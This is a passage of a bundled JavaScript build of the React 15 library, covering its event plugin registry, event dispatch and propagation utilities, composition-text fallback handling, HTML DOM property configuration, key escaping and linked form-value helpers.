@type {Object}\n   */\n  possibleRegistrationNames: \"development\" !== 'production' ? {} : null,\n  // Trust the developer to only use possibleRegistrationNames in __DEV__\n\n  /**\n   * Injects an ordering of plugins (by plugin name). This allows the ordering\n   * to be decoupled from injection of the actual plugins so that ordering is\n   * always deterministic regardless of packaging, on-the-fly injection, etc.\n   *\n   * @param {array} InjectedEventPluginOrder\n   * @internal\n   * @see {EventPluginHub.injection.injectEventPluginOrder}\n   */\n  injectEventPluginOrder: function (injectedEventPluginOrder) {\n    !!eventPluginOrder ? \"development\" !== 'production' ? invariant(false, 'EventPluginRegistry: Cannot inject event plugin ordering more than once. You are likely trying to load more than one copy of React.') : _prodInvariant('101') : void 0;\n    // Clone the ordering so it cannot be dynamically mutated.\n    eventPluginOrder = Array.prototype.slice.call(injectedEventPluginOrder);\n    recomputePluginOrdering();\n  },\n\n  /**\n   * Injects plugins to be used by `EventPluginHub`. The plugin names must be\n   * in the ordering injected by `injectEventPluginOrder`.\n   *\n   * Plugins can be injected as part of page initialization or on-the-fly.\n   *\n   * @param {object} injectedNamesToPlugins Map from names to plugin modules.\n   * @internal\n   * @see {EventPluginHub.injection.injectEventPluginsByName}\n   */\n  injectEventPluginsByName: function (injectedNamesToPlugins) {\n    var isOrderingDirty = false;\n    for (var pluginName in injectedNamesToPlugins) {\n      if (!injectedNamesToPlugins.hasOwnProperty(pluginName)) {\n        continue;\n      }\n      var pluginModule = injectedNamesToPlugins[pluginName];\n      if (!namesToPlugins.hasOwnProperty(pluginName) || namesToPlugins[pluginName] !== pluginModule) {\n        !!namesToPlugins[pluginName] ? \"development\" !== 'production' ? invariant(false, 'EventPluginRegistry: Cannot inject two different event plugins using the same name, `%s`.', pluginName) : _prodInvariant('102', pluginName) : void 0;\n        namesToPlugins[pluginName] = pluginModule;\n        isOrderingDirty = true;\n      }\n    }\n    if (isOrderingDirty) {\n      recomputePluginOrdering();\n    }\n  },\n\n  /**\n   * Looks up the plugin for the supplied event.\n   *\n   * @param {object} event A synthetic event.\n   * @return {?object} The plugin that created the supplied event.\n   * @internal\n   */\n  getPluginModuleForEvent: function (event) {\n    var dispatchConfig = event.dispatchConfig;\n    if (dispatchConfig.registrationName) {\n      return EventPluginRegistry.registrationNameModules[dispatchConfig.registrationName] || null;\n    }\n    if (dispatchConfig.phasedRegistrationNames !== undefined) {\n      // pulling phasedRegistrationNames out of dispatchConfig helps Flow see\n      // that it is not undefined.\n      var phasedRegistrationNames = dispatchConfig.phasedRegistrationNames;\n\n      for (var phase in phasedRegistrationNames) {\n        if (!phasedRegistrationNames.hasOwnProperty(phase)) {\n          continue;\n        }\n        var pluginModule = EventPluginRegistry.registrationNameModules[phasedRegistrationNames[phase]];\n        if (pluginModule) {\n          return pluginModule;\n        }\n      }\n    }\n    return null;\n  },\n\n  /**\n   * Exposed for unit testing.\n   * @private\n   */\n  _resetEventPlugins: function () {\n    eventPluginOrder = null;\n    for (var pluginName in namesToPlugins) {\n      if (namesToPlugins.hasOwnProperty(pluginName)) {\n        delete namesToPlugins[pluginName];\n      }\n    }\n    EventPluginRegistry.plugins.length = 0;\n\n    var eventNameDispatchConfigs = EventPluginRegistry.eventNameDispatchConfigs;\n    for (var eventName in eventNameDispatchConfigs) {\n      if (eventNameDispatchConfigs.hasOwnProperty(eventName)) {\n        delete eventNameDispatchConfigs[eventName];\n      }\n    }\n\n    var registrationNameModules = EventPluginRegistry.registrationNameModules;\n    for (var registrationName in registrationNameModules) {\n      if (registrationNameModules.hasOwnProperty(registrationName)) {\n        delete registrationNameModules[registrationName];\n      }\n    }\n\n    if (\"development\" !== 'production') {\n      var possibleRegistrationNames = EventPluginRegistry.possibleRegistrationNames;\n      for (var lowerCasedName in possibleRegistrationNames) {\n        if (possibleRegistrationNames.hasOwnProperty(lowerCasedName)) {\n          delete possibleRegistrationNames[lowerCasedName];\n        }\n      }\n    }\n  }\n};\n\nmodule.exports = EventPluginRegistry;\n},{\"126\":126,\"152\":152}],19:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar ReactErrorUtils = _dereq_(55);\n\nvar invariant = _dereq_(152);\nvar warning = _dereq_(159);\n\n/**\n * Injected dependencies:\n */\n\n/**\n * - `ComponentTree`: [required] Module that can convert between React instances\n *   and actual node references.\n */\nvar ComponentTree;\nvar TreeTraversal;\nvar injection = {\n  injectComponentTree: function (Injected) {\n    ComponentTree = Injected;\n    if (\"development\" !== 'production') {\n      \"development\" !== 'production' ? warning(Injected && Injected.getNodeFromInstance && Injected.getInstanceFromNode, 'EventPluginUtils.injection.injectComponentTree(...): Injected ' + 'module is missing getNodeFromInstance or getInstanceFromNode.') : void 0;\n    }\n  },\n  injectTreeTraversal: function (Injected) {\n    TreeTraversal = Injected;\n    if (\"development\" !== 'production') {\n      \"development\" !== 'production' ? warning(Injected && Injected.isAncestor && Injected.getLowestCommonAncestor, 'EventPluginUtils.injection.injectTreeTraversal(...): Injected ' + 'module is missing isAncestor or getLowestCommonAncestor.') : void 0;\n    }\n  }\n};\n\nfunction isEndish(topLevelType) {\n  return topLevelType === 'topMouseUp' || topLevelType === 'topTouchEnd' || topLevelType === 'topTouchCancel';\n}\n\nfunction isMoveish(topLevelType) {\n  return topLevelType === 'topMouseMove' || topLevelType === 'topTouchMove';\n}\nfunction isStartish(topLevelType) {\n  return topLevelType === 'topMouseDown' || topLevelType === 'topTouchStart';\n}\n\nvar validateEventDispatches;\nif (\"development\" !== 'production') {\n  validateEventDispatches = function (event) {\n    var dispatchListeners = event._dispatchListeners;\n    var dispatchInstances = event._dispatchInstances;\n\n    var listenersIsArr = Array.isArray(dispatchListeners);\n    var listenersLen = listenersIsArr ? dispatchListeners.length : dispatchListeners ? 1 : 0;\n\n    var instancesIsArr = Array.isArray(dispatchInstances);\n    var instancesLen = instancesIsArr ? dispatchInstances.length : dispatchInstances ? 1 : 0;\n\n    \"development\" !== 'production' ? warning(instancesIsArr === listenersIsArr && instancesLen === listenersLen, 'EventPluginUtils: Invalid `event`.') : void 0;\n  };\n}\n\n/**\n * Dispatch the event to the listener.\n * @param {SyntheticEvent} event SyntheticEvent to handle\n * @param {boolean} simulated If the event is simulated (changes exn behavior)\n * @param {function} listener Application-level callback\n * @param {*} inst Internal component instance\n */\nfunction executeDispatch(event, simulated, listener, inst) {\n  var type = event.type || 'unknown-event';\n  event.currentTarget = EventPluginUtils.getNodeFromInstance(inst);\n  if (simulated) {\n    ReactErrorUtils.invokeGuardedCallbackWithCatch(type, listener, event);\n  } else {\n    ReactErrorUtils.invokeGuardedCallback(type, listener, event);\n  }\n  event.currentTarget = null;\n}\n\n/**\n * Standard/simple iteration through an event's collected dispatches.\n */\nfunction executeDispatchesInOrder(event, simulated) {\n  var dispatchListeners = event._dispatchListeners;\n  var dispatchInstances = event._dispatchInstances;\n  if (\"development\" !== 'production') {\n    validateEventDispatches(event);\n  }\n  if (Array.isArray(dispatchListeners)) {\n    for (var i = 0; i < dispatchListeners.length; i++) {\n      if (event.isPropagationStopped()) {\n        break;\n      }\n      // Listeners and Instances are two parallel arrays that are always in sync.\n      executeDispatch(event, simulated, dispatchListeners[i], dispatchInstances[i]);\n    }\n  } else if (dispatchListeners) {\n    executeDispatch(event, simulated, dispatchListeners, dispatchInstances);\n  }\n  event._dispatchListeners = null;\n  event._dispatchInstances = null;\n}\n\n/**\n * Standard/simple iteration through an event's collected dispatches, but stops\n * at the first dispatch execution returning true, and returns that id.\n *\n * @return {?string} id of the first dispatch execution who's listener returns\n * true, or null if no listener returned true.\n */\nfunction executeDispatchesInOrderStopAtTrueImpl(event) {\n  var dispatchListeners = event._dispatchListeners;\n  var dispatchInstances = event._dispatchInstances;\n  if (\"development\" !== 'production') {\n    validateEventDispatches(event);\n  }\n  if (Array.isArray(dispatchListeners)) {\n    for (var i = 0; i < dispatchListeners.length; i++) {\n      if (event.isPropagationStopped()) {\n        break;\n      }\n      // Listeners and Instances are two parallel arrays that are always in sync.\n      if (dispatchListeners[i](event, dispatchInstances[i])) {\n        return dispatchInstances[i];\n      }\n    }\n  } else if (dispatchListeners) {\n    if (dispatchListeners(event, dispatchInstances)) {\n      return dispatchInstances;\n    }\n  }\n  return null;\n}\n\n/**\n * @see executeDispatchesInOrderStopAtTrueImpl\n */\nfunction executeDispatchesInOrderStopAtTrue(event) {\n  var ret = executeDispatchesInOrderStopAtTrueImpl(event);\n  event._dispatchInstances = null;\n  event._dispatchListeners = null;\n  return ret;\n}\n\n/**\n * Execution of a \"direct\" dispatch - there must be at most one dispatch\n * accumulated on the event or it is considered an error. It doesn't really make\n * sense for an event with multiple dispatches (bubbled) to keep track of the\n * return values at each dispatch execution, but it does tend to make sense when\n * dealing with \"direct\" dispatches.\n *\n * @return {*} The return value of executing the single dispatch.\n */\nfunction executeDirectDispatch(event) {\n  if (\"development\" !== 'production') {\n    validateEventDispatches(event);\n  }\n  var dispatchListener = event._dispatchListeners;\n  var dispatchInstance = event._dispatchInstances;\n  !!Array.isArray(dispatchListener) ? \"development\" !== 'production' ? invariant(false, 'executeDirectDispatch(...): Invalid `event`.') : _prodInvariant('103') : void 0;\n  event.currentTarget = dispatchListener ? EventPluginUtils.getNodeFromInstance(dispatchInstance) : null;\n  var res = dispatchListener ? dispatchListener(event) : null;\n  event.currentTarget = null;\n  event._dispatchListeners = null;\n  event._dispatchInstances = null;\n  return res;\n}\n\n/**\n * @param {SyntheticEvent} event\n * @return {boolean} True iff number of dispatches accumulated is greater than 0.\n */\nfunction hasDispatches(event) {\n  return !!event._dispatchListeners;\n}\n\n/**\n * General utilities that are useful in creating custom Event Plugins.\n */\nvar EventPluginUtils = {\n  isEndish: isEndish,\n  isMoveish: isMoveish,\n  isStartish: isStartish,\n\n  executeDirectDispatch: executeDirectDispatch,\n  executeDispatchesInOrder: executeDispatchesInOrder,\n  executeDispatchesInOrderStopAtTrue: executeDispatchesInOrderStopAtTrue,\n  hasDispatches: hasDispatches,\n\n  getInstanceFromNode: function (node) {\n    return ComponentTree.getInstanceFromNode(node);\n  },\n  getNodeFromInstance: function (node) {\n    return ComponentTree.getNodeFromInstance(node);\n  },\n  isAncestor: function (a, b) {\n    return TreeTraversal.isAncestor(a, b);\n  },\n  getLowestCommonAncestor: function (a, b) {\n    return TreeTraversal.getLowestCommonAncestor(a, b);\n  },\n  getParentInstance: function (inst) {\n    return TreeTraversal.getParentInstance(inst);\n  },\n  traverseTwoPhase: function (target, fn, arg) {\n    return TreeTraversal.traverseTwoPhase(target, fn, arg);\n  },\n  traverseEnterLeave: function (from, to, fn, argFrom, argTo) {\n    return TreeTraversal.traverseEnterLeave(from, to, fn, argFrom, argTo);\n  },\n\n  injection: injection\n};\n\nmodule.exports = EventPluginUtils;\n},{\"126\":126,\"152\":152,\"159\":159,\"55\":55}],20:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar EventPluginHub = _dereq_(17);\nvar EventPluginUtils = _dereq_(19);\n\nvar accumulateInto = _dereq_(102);\nvar forEachAccumulated = _dereq_(110);\nvar warning = _dereq_(159);\n\nvar getListener = EventPluginHub.getListener;\n\n/**\n * Some event types have a notion of different registration names for different\n * \"phases\" of propagation. This finds listeners by a given phase.\n */\nfunction listenerAtPhase(inst, event, propagationPhase) {\n  var registrationName = event.dispatchConfig.phasedRegistrationNames[propagationPhase];\n  return getListener(inst, registrationName);\n}\n\n/**\n * Tags a `SyntheticEvent` with dispatched listeners. Creating this function\n * here, allows us to not have to bind or create functions for each event.\n * Mutating the event's members allows us to not have to create a wrapping\n * \"dispatch\" object that pairs the event with the listener.\n */\nfunction accumulateDirectionalDispatches(inst, phase, event) {\n  if (\"development\" !== 'production') {\n    \"development\" !== 'production' ? warning(inst, 'Dispatching inst must not be null') : void 0;\n  }\n  var listener = listenerAtPhase(inst, event, phase);\n  if (listener) {\n    event._dispatchListeners = accumulateInto(event._dispatchListeners, listener);\n    event._dispatchInstances = accumulateInto(event._dispatchInstances, inst);\n  }\n}\n\n/**\n * Collect dispatches (must be entirely collected before dispatching - see unit\n * tests). Lazily allocate the array to conserve memory.  We must loop through\n * each event and perform the traversal for each one. We cannot perform a\n * single traversal for the entire collection of events because each event may\n * have a different target.\n */\nfunction accumulateTwoPhaseDispatchesSingle(event) {\n  if (event && event.dispatchConfig.phasedRegistrationNames) {\n    EventPluginUtils.traverseTwoPhase(event._targetInst, accumulateDirectionalDispatches, event);\n  }\n}\n\n/**\n * Same as `accumulateTwoPhaseDispatchesSingle`, but skips over the targetID.\n */\nfunction accumulateTwoPhaseDispatchesSingleSkipTarget(event) {\n  if (event && event.dispatchConfig.phasedRegistrationNames) {\n    var targetInst = event._targetInst;\n    var parentInst = targetInst ? EventPluginUtils.getParentInstance(targetInst) : null;\n    EventPluginUtils.traverseTwoPhase(parentInst, accumulateDirectionalDispatches, event);\n  }\n}\n\n/**\n * Accumulates without regard to direction, does not look for phased\n * registration names. Same as `accumulateDirectDispatchesSingle` but without\n * requiring that the `dispatchMarker` be the same as the dispatched ID.\n */\nfunction accumulateDispatches(inst, ignoredDirection, event) {\n  if (event && event.dispatchConfig.registrationName) {\n    var registrationName = event.dispatchConfig.registrationName;\n    var listener = getListener(inst, registrationName);\n    if (listener) {\n      event._dispatchListeners = accumulateInto(event._dispatchListeners, listener);\n      event._dispatchInstances = accumulateInto(event._dispatchInstances, inst);\n    }\n  }\n}\n\n/**\n * Accumulates dispatches on an `SyntheticEvent`, but only for the\n * `dispatchMarker`.\n * @param {SyntheticEvent} event\n */\nfunction accumulateDirectDispatchesSingle(event) {\n  if (event && event.dispatchConfig.registrationName) {\n    accumulateDispatches(event._targetInst, null, event);\n  }\n}\n\nfunction accumulateTwoPhaseDispatches(events) {\n  forEachAccumulated(events, accumulateTwoPhaseDispatchesSingle);\n}\n\nfunction accumulateTwoPhaseDispatchesSkipTarget(events) {\n  forEachAccumulated(events, accumulateTwoPhaseDispatchesSingleSkipTarget);\n}\n\nfunction accumulateEnterLeaveDispatches(leave, enter, from, to) {\n  EventPluginUtils.traverseEnterLeave(from, to, accumulateDispatches, leave, enter);\n}\n\nfunction accumulateDirectDispatches(events) {\n  forEachAccumulated(events, accumulateDirectDispatchesSingle);\n}\n\n/**\n * A small set of propagation patterns, each of which will accept a small amount\n * of information, and generate a set of \"dispatch ready event objects\" - which\n * are sets of events that have already been annotated with a set of dispatched\n * listener functions/ids. The API is designed this way to discourage these\n * propagation strategies from actually executing the dispatches, since we\n * always want to collect the entire set of dispatches before executing event a\n * single one.\n *\n * @constructor EventPropagators\n */\nvar EventPropagators = {\n  accumulateTwoPhaseDispatches: accumulateTwoPhaseDispatches,\n  accumulateTwoPhaseDispatchesSkipTarget: accumulateTwoPhaseDispatchesSkipTarget,\n  accumulateDirectDispatches: accumulateDirectDispatches,\n  accumulateEnterLeaveDispatches: accumulateEnterLeaveDispatches\n};\n\nmodule.exports = EventPropagators;\n},{\"102\":102,\"110\":110,\"159\":159,\"17\":17,\"19\":19}],21:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _assign = _dereq_(160);\n\nvar PooledClass = _dereq_(25);\n\nvar getTextContentAccessor = _dereq_(118);\n\n/**\n * This helper class stores information about text content of a target node,\n * allowing comparison of content before and after a given event.\n *\n * Identify the node where selection currently begins, then observe\n * both its text content and its current position in the DOM. Since the\n * browser may natively replace the target node during composition, we can\n * use its position to find its replacement.\n *\n * @param {DOMEventTarget} root\n */\nfunction FallbackCompositionState(root) {\n  this._root = root;\n  this._startText = this.getText();\n  this._fallbackText = null;\n}\n\n_assign(FallbackCompositionState.prototype, {\n  destructor: function () {\n    this._root = null;\n    this._startText = null;\n    this._fallbackText = null;\n  },\n\n  /**\n   * Get current text of input.\n   *\n   * @return {string}\n   */\n  getText: function () {\n    if ('value' in this._root) {\n      return this._root.value;\n    }\n    return this._root[getTextContentAccessor()];\n  },\n\n  /**\n   * Determine the differing substring between the initially stored\n   * text content and the current content.\n   *\n   * @return {string}\n   */\n  getData: function () {\n    if (this._fallbackText) {\n      return this._fallbackText;\n    }\n\n    var start;\n    var startValue = this._startText;\n    var startLength = startValue.length;\n    var end;\n    var endValue = this.getText();\n    var endLength = endValue.length;\n\n    for (start = 0; start < startLength; start++) {\n      if (startValue[start] !== endValue[start]) {\n        break;\n      }\n    }\n\n    var minEnd = startLength - start;\n    for (end = 1; end <= minEnd; end++) {\n      if (startValue[startLength - end] !== endValue[endLength - end]) {\n        break;\n      }\n    }\n\n    var sliceTail = end > 1 ? 1 - end : undefined;\n    this._fallbackText = endValue.slice(start, sliceTail);\n    return this._fallbackText;\n  }\n});\n\nPooledClass.addPoolingTo(FallbackCompositionState);\n\nmodule.exports = FallbackCompositionState;\n},{\"118\":118,\"160\":160,\"25\":25}],22:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar DOMProperty = _dereq_(11);\n\nvar MUST_USE_PROPERTY = DOMProperty.injection.MUST_USE_PROPERTY;\nvar HAS_BOOLEAN_VALUE = DOMProperty.injection.HAS_BOOLEAN_VALUE;\nvar HAS_NUMERIC_VALUE = DOMProperty.injection.HAS_NUMERIC_VALUE;\nvar HAS_POSITIVE_NUMERIC_VALUE = DOMProperty.injection.HAS_POSITIVE_NUMERIC_VALUE;\nvar HAS_OVERLOADED_BOOLEAN_VALUE = DOMProperty.injection.HAS_OVERLOADED_BOOLEAN_VALUE;\n\nvar HTMLDOMPropertyConfig = {\n  isCustomAttribute: RegExp.prototype.test.bind(new RegExp('^(data|aria)-[' + DOMProperty.ATTRIBUTE_NAME_CHAR + ']*$')),\n  Properties: {\n    /**\n     * Standard Properties\n     */\n    accept: 0,\n    acceptCharset: 0,\n    accessKey: 0,\n    action: 0,\n    allowFullScreen: HAS_BOOLEAN_VALUE,\n    allowTransparency: 0,\n    alt: 0,\n    // specifies target context for links with `preload` type\n    as: 0,\n    async: HAS_BOOLEAN_VALUE,\n    autoComplete: 0,\n    // autoFocus is polyfilled/normalized by AutoFocusUtils\n    // autoFocus: HAS_BOOLEAN_VALUE,\n    autoPlay: HAS_BOOLEAN_VALUE,\n    capture: HAS_BOOLEAN_VALUE,\n    cellPadding: 0,\n    cellSpacing: 0,\n    charSet: 0,\n    challenge: 0,\n    checked: MUST_USE_PROPERTY | HAS_BOOLEAN_VALUE,\n    cite: 0,\n    classID: 0,\n    className: 0,\n    cols: HAS_POSITIVE_NUMERIC_VALUE,\n    colSpan: 0,\n    content: 0,\n    contentEditable: 0,\n    contextMenu: 0,\n    controls: HAS_BOOLEAN_VALUE,\n    coords: 0,\n    crossOrigin: 0,\n    data: 0, // For `<object />` acts as `src`.\n    dateTime: 0,\n    'default': HAS_BOOLEAN_VALUE,\n    defer: HAS_BOOLEAN_VALUE,\n    dir: 0,\n    disabled: HAS_BOOLEAN_VALUE,\n    download: HAS_OVERLOADED_BOOLEAN_VALUE,\n    draggable: 0,\n    encType: 0,\n    form: 0,\n    formAction: 0,\n    formEncType: 0,\n    formMethod: 0,\n    formNoValidate: HAS_BOOLEAN_VALUE,\n    formTarget: 0,\n    frameBorder: 0,\n    headers: 0,\n    height: 0,\n    hidden: HAS_BOOLEAN_VALUE,\n    high: 0,\n    href: 0,\n    hrefLang: 0,\n    htmlFor: 0,\n    httpEquiv: 0,\n    icon: 0,\n    id: 0,\n    inputMode: 0,\n    integrity: 0,\n    is: 0,\n    keyParams: 0,\n    keyType: 0,\n    kind: 0,\n    label: 0,\n    lang: 0,\n    list: 0,\n    loop: HAS_BOOLEAN_VALUE,\n    low: 0,\n    manifest: 0,\n    marginHeight: 0,\n    marginWidth: 0,\n    max: 0,\n    maxLength: 0,\n    media: 0,\n    mediaGroup: 0,\n    method: 0,\n    min: 0,\n    minLength: 0,\n    // Caution; `option.selected` is not updated if `select.multiple` is\n    // disabled with `removeAttribute`.\n    multiple: MUST_USE_PROPERTY | HAS_BOOLEAN_VALUE,\n    muted: MUST_USE_PROPERTY | HAS_BOOLEAN_VALUE,\n    name: 0,\n    nonce: 0,\n    noValidate: HAS_BOOLEAN_VALUE,\n    open: HAS_BOOLEAN_VALUE,\n    optimum: 0,\n    pattern: 0,\n    placeholder: 0,\n    playsInline: HAS_BOOLEAN_VALUE,\n    poster: 0,\n    preload: 0,\n    profile: 0,\n    radioGroup: 0,\n    readOnly: HAS_BOOLEAN_VALUE,\n    referrerPolicy: 0,\n    rel: 0,\n    required: HAS_BOOLEAN_VALUE,\n    reversed: HAS_BOOLEAN_VALUE,\n    role: 0,\n    rows: HAS_POSITIVE_NUMERIC_VALUE,\n    rowSpan: HAS_NUMERIC_VALUE,\n    sandbox: 0,\n    scope: 0,\n    scoped: HAS_BOOLEAN_VALUE,\n    scrolling: 0,\n    seamless: HAS_BOOLEAN_VALUE,\n    selected: MUST_USE_PROPERTY | HAS_BOOLEAN_VALUE,\n    shape: 0,\n    size: HAS_POSITIVE_NUMERIC_VALUE,\n    sizes: 0,\n    span: HAS_POSITIVE_NUMERIC_VALUE,\n    spellCheck: 0,\n    src: 0,\n    srcDoc: 0,\n    srcLang: 0,\n    srcSet: 0,\n    start: HAS_NUMERIC_VALUE,\n    step: 0,\n    style: 0,\n    summary: 0,\n    tabIndex: 0,\n    target: 0,\n    title: 0,\n    // Setting .type throws on non-<input> tags\n    type: 0,\n    useMap: 0,\n    value: 0,\n    width: 0,\n    wmode: 0,\n    wrap: 0,\n\n    /**\n     * RDFa Properties\n     */\n    about: 0,\n    datatype: 0,\n    inlist: 0,\n    prefix: 0,\n    // property is also supported for OpenGraph in meta tags.\n    property: 0,\n    resource: 0,\n    'typeof': 0,\n    vocab: 0,\n\n    /**\n     * Non-standard Properties\n     */\n    // autoCapitalize and autoCorrect are supported in Mobile Safari for\n    // keyboard hints.\n    autoCapitalize: 0,\n    autoCorrect: 0,\n    // autoSave allows WebKit/Blink to persist values of input fields on page reloads\n    autoSave: 0,\n    // color is for Safari mask-icon link\n    color: 0,\n    // itemProp, itemScope, itemType are for\n    // Microdata support. See http://schema.org/docs/gs.html\n    itemProp: 0,\n    itemScope: HAS_BOOLEAN_VALUE,\n    itemType: 0,\n    // itemID and itemRef are for Microdata support as well but\n    // only specified in the WHATWG spec document. See\n    // https://html.spec.whatwg.org/multipage/microdata.html#microdata-dom-api\n    itemID: 0,\n    itemRef: 0,\n    // results show looking glass icon and recent searches on input\n    // search fields in WebKit/Blink\n    results: 0,\n    // IE-only attribute that specifies security restrictions on an iframe\n    // as an alternative to the sandbox attribute on IE<10\n    security: 0,\n    // IE-only attribute that controls focus behavior\n    unselectable: 0\n  },\n  DOMAttributeNames: {\n    acceptCharset: 'accept-charset',\n    className: 'class',\n    htmlFor: 'for',\n    httpEquiv: 'http-equiv'\n  },\n  DOMPropertyNames: {},\n  DOMMutationMethods: {\n    value: function (node, value) {\n      if (value == null) {\n        return node.removeAttribute('value');\n      }\n\n      // Number inputs get special treatment due to some edge cases in\n      // Chrome. Let everything else assign the value attribute as normal.\n      // https://github.com/facebook/react/issues/7253#issuecomment-236074326\n      if (node.type !== 'number' || node.hasAttribute('value') === false) {\n        node.setAttribute('value', '' + value);\n      } else if (node.validity && !node.validity.badInput && node.ownerDocument.activeElement !== node) {\n        // Don't assign an attribute if validation reports bad\n        // input. Chrome will clear the value. Additionally, don't\n        // operate on inputs that have focus, otherwise Chrome might\n        // strip off trailing decimal places and cause the user's\n        // cursor position to jump to the beginning of the input.\n        //\n        // In ReactDOMInput, we have an onBlur event that will trigger\n        // this function again when focus is lost.\n        node.setAttribute('value', '' + value);\n      }\n    }\n  }\n};\n\nmodule.exports = HTMLDOMPropertyConfig;\n},{\"11\":11}],23:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\n/**\n * Escape and wrap key so it is safe to use as a reactid\n *\n * @param {string} key to be escaped.\n * @return {string} the escaped key.\n */\n\nfunction escape(key) {\n  var escapeRegex = /[=:]/g;\n  var escaperLookup = {\n    '=': '=0',\n    ':': '=2'\n  };\n  var escapedString = ('' + key).replace(escapeRegex, function (match) {\n    return escaperLookup[match];\n  });\n\n  return '$' + escapedString;\n}\n\n/**\n * Unescape and unwrap key for human-readable display\n *\n * @param {string} key to unescape.\n * @return {string} the unescaped key.\n */\nfunction unescape(key) {\n  var unescapeRegex = /(=0|=2)/g;\n  var unescaperLookup = {\n    '=0': '=',\n    '=2': ':'\n  };\n  var keySubstring = key[0] === '.' && key[1] === '$' ? key.substring(2) : key.substring(1);\n\n  return ('' + keySubstring).replace(unescapeRegex, function (match) {\n    return unescaperLookup[match];\n  });\n}\n\nvar KeyEscapeUtils = {\n  escape: escape,\n  unescape: unescape\n};\n\nmodule.exports = KeyEscapeUtils;\n},{}],24:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar ReactPropTypesSecret = _dereq_(73);\nvar propTypesFactory = _dereq_(162);\n\nvar React = _dereq_(135);\nvar PropTypes = propTypesFactory(React.isValidElement);\n\nvar invariant = _dereq_(152);\nvar warning = _dereq_(159);\n\nvar hasReadOnlyValue = {\n  button: true,\n  checkbox: true,\n  image: true,\n  hidden: true,\n  radio: true,\n  reset: true,\n  submit: true\n};\n\nfunction _assertSingleLink(inputProps) {\n  !(inputProps.checkedLink == null || inputProps.valueLink == null) ? \"development\" !== 'production' ? invariant(false, 'Cannot provide a checkedLink and a valueLink. If you want to use checkedLink, you probably don\\'t want to use valueLink and vice versa.') : _prodInvariant('87') : void 0;\n}\nfunction _assertValueLink(inputProps) {\n  _assertSingleLink(inputProps);\n  !(inputProps.value == null && inputProps.onChange == null) ? \"development\" !== 'production' ? invariant(false, 'Cannot provide a valueLink and a value or onChange event. If you want to use value or onChange, you probably don\\'t want to use valueLink.') : _prodInvariant('88') : void 0;\n}\n\nfunction _assertCheckedLink(inputProps) {\n  _assertSingleLink(inputProps);\n  !(inputProps.checked == null && inputProps.onChange == null) ? \"development\" !== 'production' ? invariant(false, 'Cannot provide a checkedLink and a checked property or onChange event. If you want to use checked or onChange, you probably don\\'t want to use checkedLink') : _prodInvariant('89') : void 0;\n}\n\nvar propTypes = {\n  value: function (props, propName, componentName) {\n    if (!props[propName] || hasReadOnlyValue[props.type] || props.onChange || props.readOnly || props.disabled) {\n      return null;\n    }\n    return new Error('You provided a `value` prop to a form field without an ' + '`onChange` handler. This will render a read-only field. If ' + 'the field should be mutable use `defaultValue`. Otherwise, ' + 'set either `onChange` or `readOnly`.');\n  },\n  checked: function (props, propName, componentName) {\n    if (!props[propName] || props.onChange || props.readOnly || props.disabled) {\n      return null;\n    }\n    return new Error('You provided a `checked` prop to a form field without an ' + '`onChange` handler. This will render a read-only field. If ' + 'the field should be mutable use `defaultChecked`. Otherwise, ' + 'set either `onChange` or `readOnly`.');\n  },\n  onChange: PropTypes.func\n};\n\nvar loggedTypeFailures = {};\nfunction getDeclarationErrorAddendum(owner) {\n  if (owner) {\n    var name = owner.getName();\n    if (name) {\n      return ' Check the render method of `' + name + '`.';\n    }\n  }\n  return '';\n}\n\n/**\n * Provide a linked `value` attribute for controlled forms. You should not use\n * this outside of the ReactDOM controlled form components.\n */\nvar LinkedValueUtils = {\n  checkPropTypes: function (tagName, props, owner) {\n    for (var propName in propTypes) {\n      if (propTypes.hasOwnProperty(propName)) {\n        var error = propTypes[propName](props, propName, tagName, 'prop', null, ReactPropTypesSecret);\n      }\n      if (error instanceof Error && !(error.message in loggedTypeFailures)) {\n        // Only monitor this failure once because there tends to be a lot of the\n        // same error.\n        loggedTypeFailures[error.message] = true;\n\n        var addendum = getDeclarationErrorAddendum(owner);\n        \"development\" !== 'production' ? warning(false, 'Failed form propType: %s%s', error.message, addendum) : void 0;\n      }\n    }\n  },\n\n  /**\n   * @param {object} inputProps Props for form component\n   * @return {*} current value of the input either from value prop or link.\n   */\n  getValue: function (inputProps) {\n    if (inputProps.valueLink) {\n      _assertValueLink(inputProps);\n      return inputProps.valueLink.value;\n    }\n    return inputProps.value;\n  },\n\n  /**\n   * @param {object} inputProps Props for form component\n   * @return {*} current checked status of the input either from checked prop\n   *             or link.\n   */\n  getChecked: function (inputProps) {\n    if (inputProps.checkedLink) {\n      _assertCheckedLink(inputProps);\n      return inputProps.checkedLink.value;\n    }\n    return inputProps.checked;\n  },\n\n  /**\n   * @param {object} inputProps Props for form component\n   * @param {SyntheticEvent} event change event to handle\n   */\n  executeOnChange: function (inputProps, event) {\n    if (inputProps.valueLink) {\n     